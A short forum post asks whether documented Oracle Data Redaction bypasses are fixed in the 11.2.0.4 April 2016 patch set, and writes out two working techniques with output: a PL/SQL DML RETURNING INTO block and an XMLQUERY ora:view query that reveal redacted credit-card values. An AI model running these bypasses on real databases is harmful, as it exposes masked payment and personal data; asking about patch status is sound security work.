REDACTION vulnerabilities. Are they fixed on OR 11.2.0.4 APR 2016 PSU ?
Hi all, I wonder if the following vulnerabilities on Oracle Data REDACTION has been fixed and on which patch set?
Here they are:
1) DML RETURNING INTO and
SQL> SET SERVEROUTPUT ON
SQL> DECLARE
2 buffer varchar(30);
3 BEGIN
4 UPDATE redactiontest
5 SET id = id
6 WHERE id = 1
7 RETURNING cc INTO buffer;
8 DBMS_OUTPUT.put_line('CC=' || buffer);
9 END;
10 /
CC=4111222233334444
2) XMLQUERY() bypasses and
select xmlquery('for $i in ora:view("REDACTIONTEST") return $i'
returning content) from dual;
MLQUERY('FOR$IINORA:VIEW("REDACTIONTEST")RETURN$I'RETURNINGCONTENT)
---------------------------------------------------------------------------
<ROW><CC>4111222233334444</CC><ID>1</ID></ROW><ROW><CC>3998887776665554</CC
><ID>
3) by allowing a policy to determine whether a redacted column can be referenced in a WHERE clause